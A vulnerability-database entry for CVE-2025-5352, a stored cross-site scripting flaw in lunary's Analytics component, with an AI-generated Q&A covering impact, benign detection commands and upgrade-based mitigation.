CVE-2025-5352
BaseFortify
Publication date: 2025-08-23
Last updated on: 2025-11-26
Assigner: huntr.dev
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| lunary | lunary | to 1.9.25 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a critical stored Cross-Site Scripting (XSS) issue in the Analytics component of lunary-ai/lunary versions up to 1.9.23. It occurs because the environment variable NEXT_PUBLIC_CUSTOM_SCRIPT is directly injected into the DOM using dangerouslySetInnerHTML without any sanitization or validation. This allows an attacker who can control this environment variable during deployment or via server compromise to execute arbitrary JavaScript in all users' browsers.
How can this vulnerability impact me? :
The vulnerability can lead to complete account takeover, data exfiltration, malware distribution, and persistent attacks affecting all users until the environment variable is cleaned. Arbitrary JavaScript execution in users' browsers can compromise user data and system integrity.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection involves checking if the vulnerable lunary-ai/lunary version (up to 1.9.23) is deployed and if the environment variable NEXT_PUBLIC_CUSTOM_SCRIPT is set and injected into the DOM. You can inspect the deployed application for the presence of this environment variable usage or the injected script. For example, you can search the deployed code or running environment for the variable with commands like `grep -r NEXT_PUBLIC_CUSTOM_SCRIPT /path/to/deployment` or check environment variables with `printenv | grep NEXT_PUBLIC_CUSTOM_SCRIPT`. Additionally, inspecting the frontend code or network traffic for injected scripts matching the custom script pattern may help. Since the vulnerability involves script injection via dangerouslySetInnerHTML, using browser developer tools to inspect the DOM for unexpected script tags or inline scripts related to this variable can also help detect exploitation. [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade lunary-ai/lunary to version 1.9.25 or later, where the vulnerable code injecting the NEXT_PUBLIC_CUSTOM_SCRIPT environment variable has been removed. If upgrading is not immediately possible, ensure that the NEXT_PUBLIC_CUSTOM_SCRIPT environment variable is not set or controlled by untrusted sources to prevent arbitrary script injection. Additionally, review deployment and server environments for any compromise that could allow manipulation of this environment variable. Removing or sanitizing this environment variable before deployment can reduce risk until the upgrade is applied. [1]